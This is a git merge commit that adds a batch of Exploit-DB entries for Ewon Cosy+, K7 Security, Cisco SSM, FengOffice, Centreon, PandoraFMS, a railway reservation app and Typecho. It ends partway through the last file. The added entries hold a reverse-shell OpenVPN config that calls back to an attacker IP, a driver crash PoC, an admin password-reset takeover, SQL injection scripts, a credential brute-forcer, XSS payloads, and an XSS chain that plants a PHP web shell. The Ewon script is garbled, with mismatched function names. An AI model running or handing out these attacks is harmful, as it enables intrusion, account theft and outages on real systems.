Merge remote-tracking branch 'exploitdb/main'

2025-04-12 00:01:16 +00:00 · 2025-04-12 00:01:16 +00:00 · 70472131cc
commit 70472131cc
parent 1dbb33ef37 9d3e200bec
12 changed files with 1275 additions and 0 deletions
--- a/exploits/multiple/hardware/52160.py
+++ b/exploits/multiple/hardware/52160.py
@ -0,0 +1,53 @@
 Hey,
 Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
 maintenance in industrial environments. The manufacturer describes the
 product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
 VPN connection between the machine (PLC, HMI, or other devices) and the
 remote engineer. The connection happens through Talk2m, a highly secured
 industrial cloud service. The Ewon Cosy+ makes industrial remote access
 easy and secure like never before!" Due to improper neutralization of
 parameters read from a user-controlled configuration file, an authenticated
 attacker is able to inject and execute OS commands on the device.
 Vulnerability Details: Authenticated attackers are able to upload a custom
 OpenVPN configuration. This configuration can contain the OpenVPN
 paramaters "--up" and "--down", which execute a specified script or
 executable. Since the process itself runs with the highest privileges
 (root), this allows the device to be completely compromised.
 PoC:
 # Exploit Title: Ewon Cosy+ Command Injection
 # Google Dork: N/A
 # Date: 2024-8-20
 # Exploit Author: CodeB0ss
 # Contact: t.me/codeb0ss / uncodeboss@gmail.com
 # Version: 21.2s7
 # Tested on: Windows 11 Home Edition
 # CVE: CVE-2024-33896
 import socket
 import subprocess
 import time
 def configcreator(file_path):
 with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
 proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
 $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
 l3st(port): server_socket = socket.socket(socket.AF_INET,
 socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
 server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
 client_socket, _ = server_socket.accept() print(" - --> Recevied") while
 True: data = client_socket.recv(1024) if not data: break
 print(data.decode()) client_socket.close() server_socket.close() if name ==
 "main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
 5000 listener_process = subprocess.Popen(['python', '-c', f'from main
 import start_listener; start_listener({port})']) time.sleep(2)
 create_malicious_openvpn_config(config) print(f" - --> config_created
 {config}")
 GitHub:
 https://github.com/codeb0ss/CVE-2024-33896-PoC
--- a/exploits/multiple/remote/52158.py
+++ b/exploits/multiple/remote/52158.py
@ -0,0 +1,92 @@
 # Title:  K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference
 # Date: 13.08.2024
 # Author: M. Akil Gündoğan
 # Vendor Homepage: https://k7computing.com/
 # Version: < v17.0.2019
 # Tested on: Windows 10 Pro x64
 # CVE ID: CVE-2024-36424
 # Vulnerability Description:
 --------------------------------------
 In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
 # Technical details and step by step Proof of Concept's (PoC):
 --------------------------------------
 1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
 2 - Compile the attached PoC code written in C++ as release on VS 2022.
 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
 # Impact:
 --------------------------------------
 An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
 # Advisories:
 --------------------------------------
 K7 Computing recommends that all customers update their products to the corresponding versions shown below:
 K7 Ultimate Security (17.0.2019 or Higher)
 # Timeline:
 --------------------------------------
 - 16.05.2024 - Vulnerability reported.
 - 05.08.2024 - Vendor has fixed the vulnerability.
 - 13.08.2024 - Released.
 # References:
 --------------------------------------
 - Vendor: https://www.k7computing.com
 - Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
 - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
 - Repository: https://github.com/secunnix/CVE-2024-36424
 # PoC Code (C++):
 -------------------------------------------------------------------------------------------------------------------------
 /*
 # Usage: Only compile it and run, boooom :)
 */
 #include <windows.h>
 #include <iostream>
 const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
 const DWORD ioCTL = 0x222010;  // IOCTL 0x222010 or 0x222014
 int main() {
    std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
    HANDLE hDevice = CreateFile(driverDevice.c_str(),
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
        return 1;
    }
    void* inputBuffer = nullptr; // Null input buffer
    DWORD inputBufferSize = 0;
    DWORD bytesReturned;
    BOOL result = DeviceIoControl(hDevice,
        ioCTL,
        inputBuffer,
        inputBufferSize,
        nullptr,
        0,
        &bytesReturned,
        nullptr);
    if (!result) {
        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
    }
    CloseHandle(hDevice);
    return 0;
 }
--- a/exploits/multiple/webapps/52155.py
+++ b/exploits/multiple/webapps/52155.py
@ -0,0 +1,118 @@
 # Exploit Title: Cisco SSM On-Prem; Account Takeover (CVE-2024-20419)
 # Google Dork: N/A
 # Date: 21/07/2024
 # Exploit Author: Mohammed Adel
 # Vendor Homepage: https://www.cisco.com
 # Software Link:
 https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
 # Version: 8-202206 and earlier
 # Tested on: Kali Linux
 # CVE : CVE-2024-20419
 # Security Advisory:
 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
 # Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
 import requests, sys
 from urllib.parse import unquote
 # Suppress SSL warnings
 requests.packages.urllib3.disable_warnings()
 Domain = sys.argv[1] # Domain, https://0xpolar.com:8443
 Username = sys.argv[2] # Username, by default its [admin]
 password = "Polar@123456780"
 print("[*] Cisco Smart Software Manager On-Prem")
 print("[*] Account Takeover Exploit")
 print("[*] Target: "+Domain)
 print("[*] Username: "+Username)
 print("\n")
 print("[*] Getting Necessary Tokens..")
 get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
 response = requests.get(get_url, verify=False)
 def get_cookie_value(headers, cookie_name):
    cookies = headers.get('Set-Cookie', '').split(',')
    for cookie in cookies:
        if cookie_name in cookie:
            parts = cookie.split(';')
            for part in parts:
                if cookie_name in part:
                    return part.split('=')[1].strip()
    return None
 set_cookie_headers = response.headers.get('Set-Cookie', '')
 xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
 lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')
 if xsrf_token:
    xsrf_token = unquote(xsrf_token)
 if not lic_engine_session or not xsrf_token:
    print("Required cookies not found in the response.")
 else:
    print("[+] lic_engine_session: "+lic_engine_session)
    print("[+] xsrf_token: "+xsrf_token)
    print("\n[*] Generating Auth Token")
    post_url = Domain+"/backend/reset_password/generate_code"
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Xsrf-Token': xsrf_token,
        'Sec-Ch-Ua': '',
        'Sec-Ch-Ua-Mobile': '?0',
    }
    cookies = {
        '_lic_engine_session': lic_engine_session,
        'XSRF-TOKEN': xsrf_token,
    }
    payload = {
        'uid': Username
    }
    post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
    post_response_json = post_response.json()
    auth_token = post_response_json.get('auth_token')
    if not auth_token:
        print("auth_token not found in the response.")
    else:
        print("[+] Auth Token: "+auth_token)
        print("\n[*] Setting Up a New Password")
        final_post_url = Domain+"/backend/reset_password"
        final_headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'X-Xsrf-Token': xsrf_token,
        }
        final_cookies = {
            '_lic_engine_session': lic_engine_session,
            'XSRF-TOKEN': xsrf_token,
        }
        final_payload = {
            'uid': Username,
            'auth_token': auth_token,
            'password': password,
            'password_confirmation': password,
            'common_name': ''
        }
        final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
        response_text = final_post_response.text
        if "OK" in response_text:
            print("[+] Password Successfully Changed!")
            print("[+] Username: "+Username)
            print("[+] New Password: "+password)
        else:
            print("[!] Something Went Wrong")
            print(response_text)
--- a/exploits/php/webapps/52154.NA
+++ b/exploits/php/webapps/52154.NA
@ -0,0 +1,29 @@
 # Exploit Title: Blind SQL Injection - FengOffice
 # Date: 7/2024
 # Exploit Author: Andrey Stoykov
 # Version: 3.11.1.2
 # Tested on: Ubuntu 22.04
 # Blog: http://msecureltd.blogspot.com
 SQL Injection:
 1. Login to application
 2. Click on "Workspaces"
 3. Copy full URL
 4. Paste the HTTP GET request into text file
 5. Set the injection point to be in the "dim" parameter value
 6. Use SQLMap to automate the process
 sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
 --fingerprint
 [...]
 [12:13:03] [INFO] confirming MySQL
 [12:13:04] [INFO] the back-end DBMS is MySQL
 [12:13:04] [INFO] actively fingerprinting MySQL
 [12:13:05] [INFO] executing MySQL comment injection fingerprint
 web application technology: Apache
 back-end DBMS: active fingerprint: MySQL >=3D 5.7
               comment injection fingerprint: MySQL 5.7.37
 [...]
--- a/exploits/php/webapps/52156.py
+++ b/exploits/php/webapps/52156.py
@ -0,0 +1,101 @@
 #!/usr/bin/env python3
 # Tested on Centreon API 19.04.0
 # Centreon 19.04 - Login Password Bruteforcer
 # Written on 6 Nov 2019
 # Referencing API Authentication of the Centreon API document
 # Author: st4rry
 # centbruteon.py
 # Centreon Download Link: https://download.centreon.com/#version-Older
 # Dependencies: sys, requests, argparse, termcolor, os
 import sys
 import requests
 import argparse
 from termcolor import colored
 import os
 def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
    parser.add_argument('-l', dest='username', help='Specific username')
    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()
    protocol = 'https' if args.https else 'http'
    server = f"{protocol}://{args.host}:{args.port}"
    user = args.username
    passfile = args.passwfile.read().splitlines()
    userfile = args.userfile
    dirlo = '/centreon/api/index.php?action=authenticate'
    verify_ssl = not args.insecure
    if args.ca_bundle:
        verify_ssl = args.ca_bundle
    if user:
        brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
    elif userfile:
        usrwl = userfile.read().splitlines()
        brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
    else:
        print(colored('Something went wrong!', 'red'))
        sys.exit(1)
 def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
    for password in passfile:
        data = {'username': user, 'password': password}
        r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
        try:
            print('Processing...')
            print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                  colored(' Username: ', 'yellow') + colored(user, 'yellow') +
                  colored(' Password: ', 'yellow') + colored(password, 'yellow'))
            if r.status_code == 200:
                print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
                      colored(' password: ', 'green') + colored(password, 'green') +
                      colored(' server: ', 'green') + colored(server, 'green'))
                print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                print('\n')
                break
            else:
                print(colored('403 - Unauthenticated!', 'red'))
        except IndexError:
            print(colored('Something went wrong', 'red'))
 def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
    for usr in usrwl:
        for password in passfile:
            data = {'username': usr, 'password': password}
            r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
            try:
                print('Processing...')
                print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
                      colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
                      colored(' Password: ', 'yellow') + colored(password, 'yellow'))
                if r.status_code == 200:
                    print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
                          colored(' password: ', 'green') + colored(password, 'green') +
                          colored(' server: ', 'green') + colored(server, 'green'))
                    print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                    print('\n')
                else:
                    print(colored('403 - Unauthenticated!', 'red'))
            except IndexError:
                print(colored('Something went wrong', 'red'))
 if __name__ == '__main__':
    main()
--- a/exploits/php/webapps/52157.py
+++ b/exploits/php/webapps/52157.py
@ -0,0 +1,136 @@
 # Exploit Title: PandoraFMS console v7.0NG.772 - SQL Injection (Authenticated)
 # Date: 21/11/2023
 # Exploit Author: Osama Yousef
 # Vendor Homepage: https://pandorafms.com/
 # Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
 # Version: v7.0NG.772
 # Tested on: Linux
 # CVE : CVE-2023-44088
 import re, requests, argparse, string, random, base64
 import urllib3
 import html
 headers = {
 	'Cache-Control': 'max-age=0',
 	'Origin': '',
 	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
 	'Accept': '*/*',
 	'Referer': ''
 }
 def login(session, url, username, password):
 	res = session.get(url)
 	csrf = retrieve_csrftoken(res.text)
 	url+= '?login=1'
 	payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
 	res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
 	if 'User is blocked' in res.text:
 		print("Login Failed!")
 		exit(1)
 def exploit(session, url, imagepath, query):
 	url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
 	name = random_id(10)
 	payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
 	payload=payload.replace(' ', '\t')
 	files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
 	# Create a reference to the original _make_request method
 	urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
 	# Replace the _make_request method with the custom_make_request function
 	urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
 	res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
 	if 'Created successfully' not in res.text:
 		print("Failed to create a visual console!")
 		exit(1)
 	url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
 	res = session.get(url2)
 	x = re.search('(?:<a href=".*">)'+name, res.text)
 	match = x.group()
 	url3 = match.lstrip("<a href=")
 	url3 = url3.split('"')[1]
 	url3 = url3.split("?")[1]
 	url3 = html.unescape(url3)
 	url4 = url+ "?" + url3
 	res = session.get(url4)
 	x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
 	match = x.group()
 	output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
 	output = output.split('","backgroundImage')[0]
 	print("Query output: {}".format(output))
 def retrieve_csrftoken(response):
 	x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden"  value=")[a-zA-Z0-9]*(?:")', response)
 	match = x.group()
 	csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden"  value="').rstrip('"')
 	print("CSRF: {}".format(csrf))
 	return csrf
 def random_id(len):
 	chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
 	return ''.join(random.choice(chars) for _ in range(len))
 def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
 	body = httplib_request_kw['body']
 	if body:
 		body = body.replace(b"%09", b"\t"*3)
 	httplib_request_kw['body'] = body
 	return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)
 def main():
 	ap = argparse.ArgumentParser()
 	ap.add_argument("-t", "--target", required=True, help="Target URI")
 	ap.add_argument("-u", "--username", required=True, help="Username")
 	ap.add_argument("-p", "--password", required=True, help="Password")
 	ap.add_argument("-i", "--image", required=True, help="Image path")
 	ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
 	ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
 	args = vars(ap.parse_args())
 	session = requests.Session()
 	url = args['target']
 	if 'pandora_console' not in url:
 		if not url.endswith('/'):
 			url += '/'
 		url += 'pandora_console/'
 	headers['Origin'] = args['target']
 	headers['Referer'] = args['target']
 	session.headers.update(headers)
 	proxies = {}
 	if args['proxy'] is not None:
 		if 'https' in args['proxy']:
 			proxies['https'] = args['proxy']
 		else:
 			proxies['http'] = args['proxy']
 	session.proxies.update(proxies)
 	login(session, url, args['username'], args['password'])
 	exploit(session, url, args['image'], args['query'])
 if __name__=='__main__':
 	main()
--- a/exploits/php/webapps/52159.txt
+++ b/exploits/php/webapps/52159.txt
@ -0,0 +1,24 @@
 # Exploit Title: XSS Vulnerability in Online Railway Reservation System 1.0
 # Date: 2024-08-15
 # Exploit Author: Raj Nandi
 # Vendor Homepage: https://codeastro.com/
 # Software Link:
 https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
 # Version: 1.0
 # Tested on: Any OS
 # CVE: CVE-2024-7815
 ## Description:
 A Cross-Site Scripting (XSS) vulnerability exists in [Application
 Name/Version]. This vulnerability allows an attacker to inject and execute
 arbitrary JavaScript code within the context of the user's browser session.
 ## Proof of Concept (PoC):
 1. Navigate to [vulnerable page or input field].
 2. Input the following payload: `<script>alert(document.cookie)</script>`
 3. Upon execution, the script will trigger and display the user's cookies
 in an alert box.
 ## Mitigation:
 To prevent this vulnerability, ensure that all user inputs are properly
 sanitized and validated before being reflected back on the webpage.
--- a/exploits/php/webapps/52161.go
+++ b/exploits/php/webapps/52161.go
@ -0,0 +1,182 @@
 // Exploit Title: Typecho <= 1.3.0 Race Condition
 // Google Dork: intext:"Powered by Typecho" inurl:/index.php
 // Date: 18/08/2024
 // Exploit Author: Michele 'cyberaz0r' Di Bonaventura
 // Vendor Homepage: https://typecho.org
 // Software Link: https://github.com/typecho/typecho
 // Version: 1.3.0
 // Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
 // CVE: CVE-2024-35539
 // For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
 package main
 import (
 	"bytes"
 	"fmt"
 	"io"
 	"net/http"
 	"net/url"
 	"os"
 	"strings"
 	"sync"
 	"sync/atomic"
 	"time"
 	"github.com/robertkrimen/otto"
 )
 var (
 	c                    int32 = 0
 	commentsPostInterval int64 = 60
 	maxThreads           int   = 1000
 	wg                   sync.WaitGroup
 	userAgent            string       = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
 	client               *http.Client = &http.Client{
 		CheckRedirect: func(req *http.Request, via []*http.Request) error {
 			return http.ErrUseLastResponse
 		},
 	}
 )
 func getJSFunction(u string) string {
 	req, err := http.NewRequest("GET", u, nil)
 	if err != nil {
 		fmt.Println("[X] Error creating initial request:", err)
 		return ""
 	}
 	req.Header.Set("User-Agent", userAgent)
 	resp, err := client.Do(req)
 	if err != nil {
 		fmt.Println("[X] Error sending initial request:", err)
 		return ""
 	}
 	buf := new(bytes.Buffer)
 	buf.ReadFrom(resp.Body)
 	body := buf.String()
 	if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
 		fmt.Println("[X] Error finding JavaScript function")
 		return ""
 	}
 	jsFunction := strings.Split(body, "input.value = (")[1]
 	jsFunction = strings.Split(jsFunction, ")();;")[0]
 	return jsFunction
 }
 func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
 	vm := otto.New()
 	_, err := vm.Run(jsFunctionBody)
 	if err != nil {
 		fmt.Println("[X] Error executing JavaScript function:", err)
 		return ""
 	}
 	result, err := vm.Call(jsFunctionName, nil)
 	if err != nil {
 		fmt.Println("[X] Error calling JavaScript function:", err)
 		return ""
 	}
 	returnValue, err := result.ToString()
 	if err != nil {
 		fmt.Println("[X] Error converting JavaScript result to string:", err)
 		return ""
 	}
 	return returnValue
 }
 func spamComments(u string, formToken string) {
 	timestamp := time.Now().Unix()
 	for {
 		i := 0
 		for time.Now().Unix() < timestamp-1 {
 			time.Sleep(250 * time.Millisecond)
 			fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds)    ", timestamp-time.Now().Unix()-1)
 		}
 		fmt.Printf("\n")
 		for time.Now().Unix() < timestamp+2 {
 			if i < maxThreads {
 				wg.Add(1)
 				go spamRequest(u, formToken, i)
 				i++
 			}
 		}
 		wg.Wait()
 		fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
 		timestamp = time.Now().Unix() + commentsPostInterval
 	}
 }
 func spamRequest(u string, formToken string, i int) {
 	fmt.Printf("\r[*] Spamming comment request %d    ", i)
 	defer wg.Done()
 	formData := url.Values{}
 	formData.Set("_", formToken)
 	formData.Set("author", fmt.Sprintf("user_%d", i))
 	formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
 	formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
 	req, err := http.NewRequest("POST", u+"comment", nil)
 	if err != nil {
 		return
 	}
 	req.Header.Set("Referer", u)
 	req.Header.Set("User-Agent", userAgent)
 	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
 	req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
 	resp, err := client.Do(req)
 	if err != nil {
 		return
 	}
 	if resp.StatusCode == 302 {
 		atomic.AddInt32(&c, 1)
 	}
 	defer resp.Body.Close()
 }
 func main() {
 	if len(os.Args) != 2 {
 		fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
 		return
 	}
 	fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
 	targetUrl := os.Args[1]
 	fmt.Println("[+] Spam target:", targetUrl)
 	fmt.Println("[*] Getting JavaScript function to calculate form token...")
 	jsFunction := getJSFunction(targetUrl)
 	if jsFunction == "" {
 		fmt.Println("[-] Could not get JavaScript function, exiting...")
 		return
 	}
 	fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
 	formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
 	if formToken == "" {
 		fmt.Println("[-] Could not get form token, exiting...")
 		return
 	}
 	fmt.Printf("[+] Form token: %s", formToken)
 	spamComments(targetUrl, formToken)
 }
--- a/exploits/php/webapps/52162.go
+++ b/exploits/php/webapps/52162.go
@ -0,0 +1,254 @@
 // Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS)
 // Google Dork: intext:"Powered by Typecho" inurl:/index.php
 // Date: 18/08/2024
 // Exploit Author: Michele 'cyberaz0r' Di Bonaventura
 // Vendor Homepage: https://typecho.org
 // Software Link: https://github.com/typecho/typecho
 // Version: 1.3.0
 // Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
 // CVE: CVE-2024-35540
 // For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
 package main
 import (
 	"bufio"
 	"bytes"
 	"crypto/rand"
 	"crypto/sha256"
 	"encoding/base64"
 	"fmt"
 	"net/http"
 	"net/url"
 	"os"
 	"strings"
 	"time"
 )
 var (
 	postTitle string       = "Reflected XSS PoC"
 	postText  string       = "Hey admin! Look at the draft of this blog post, can I publish it?"
 	userAgent string       = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
 	client    *http.Client = &http.Client{
 		CheckRedirect: func(req *http.Request, via []*http.Request) error {
 			return http.ErrUseLastResponse
 		},
 	}
 )
 func getEditUrl(u string, cookies string) string {
 	req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
 	if err != nil {
 		fmt.Println("[X] Error creating initial request:", err)
 		return ""
 	}
 	req.Header.Set("Cookie", cookies)
 	req.Header.Set("User-Agent", userAgent)
 	resp, err := client.Do(req)
 	if err != nil {
 		fmt.Println("[X] Error sending initial request:", err)
 		return ""
 	}
 	buf := new(bytes.Buffer)
 	buf.ReadFrom(resp.Body)
 	body := buf.String()
 	if !strings.Contains(body, "<form action=\"") {
 		fmt.Println("[X] Error finding post edit URL")
 		return ""
 	}
 	editUrl := strings.Split(body, "<form action=\"")[1]
 	editUrl = strings.Split(editUrl, "\"")[0]
 	return editUrl
 }
 func generateRandomBytes() string {
 	bytes := make([]byte, 64)
 	rand.Read(bytes)
 	return fmt.Sprintf("%x", sha256.Sum256(bytes))
 }
 func getJsCode(password string) string {
 	phpPayload := `
 		header("X-Random-Token: " . md5(uniqid()));
 		if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
 			if (isset($_POST["action"])) {
 				system($_POST["action"]);
 				exit;
 			}
 		}
 	`
 	phpPayload = fmt.Sprintf(phpPayload, password)
 	jsPayload := `
 		var i = document.createElement('iframe');
 		i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
 		i.style.display = 'none';
 		document.body.appendChild(i);
 		setTimeout(() => {
 			var textarea = i.contentWindow.document.getElementById('content');
 			if (textarea.value.includes(payload))
 				return;
 			textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
 			var form = i.contentWindow.document.getElementById('theme').submit();
 		}, 200);
 	`
 	return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
 }
 func generatePayload(jsCode string) string {
 	remainder := len(jsCode) % 3
 	if remainder != 0 {
 		jsCode += strings.Repeat(" ", 3-remainder)
 	}
 	jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
 	return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
 }
 func createPost(u string, cookies string, payload string) string {
 	formData := url.Values{}
 	formData.Set("title", postTitle)
 	formData.Set("text", payload+"\n"+postText)
 	formData.Set("do", "save")
 	formData.Set("markdown", "1")
 	formData.Set("category%5B%5D", "1")
 	formData.Set("allowComment", "1")
 	formData.Set("allowPing", "1")
 	formData.Set("allowFeed", "1")
 	formData.Set("dst", "60")
 	formData.Set("timezone", "7200")
 	req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
 	if err != nil {
 		fmt.Println("[X] Error creating malicious post creation request:", err)
 		return ""
 	}
 	req.Header.Set("Cookie", cookies)
 	req.Header.Set("User-Agent", userAgent)
 	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
 	req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
 	resp, err := client.Do(req)
 	if err != nil {
 		fmt.Println("[X] Error sending malicious post creation request:", err)
 		return ""
 	}
 	defer resp.Body.Close()
 	return resp.Header.Get("Location")
 }
 func checkInjected(u string) bool {
 	req, err := http.NewRequest("HEAD", u, nil)
 	if err != nil {
 		return false
 	}
 	req.Header.Set("User-Agent", userAgent)
 	resp, err := client.Do(req)
 	if err != nil {
 		return false
 	}
 	return resp.Header.Get("X-Random-Token") != ""
 }
 func readInput() string {
 	scanner := bufio.NewScanner(os.Stdin)
 	if scanner.Scan() {
 		return scanner.Text()
 	}
 	return ""
 }
 func interactiveShell(u string, password string) {
 	for {
 		fmt.Print("$ ")
 		cmd := readInput()
 		formData := url.Values{}
 		formData.Set("CSRFToken", password)
 		formData.Set("action", cmd)
 		req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
 		if err != nil {
 			fmt.Println("[X] Error creating shell request:", err)
 			continue
 		}
 		req.Header.Set("User-Agent", userAgent)
 		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 		req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
 		resp, err := client.Do(req)
 		if err != nil {
 			fmt.Println("[X] Error sending shell request:", err)
 			continue
 		}
 		buf := new(bytes.Buffer)
 		buf.ReadFrom(resp.Body)
 		body := buf.String()
 		fmt.Println(body)
 	}
 }
 func main() {
 	if len(os.Args) != 3 {
 		fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
 		os.Exit(1)
 	}
 	fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
 	targetUrl := os.Args[1]
 	cookies := os.Args[2]
 	fmt.Println("[*] Getting post edit URL with CSRF token...")
 	editUrl := getEditUrl(targetUrl, cookies)
 	if editUrl == "" {
 		fmt.Println("[-] Could not get post edit URL, exiting...")
 		return
 	}
 	fmt.Println("[+] Edit URL:", editUrl)
 	password := generateRandomBytes()
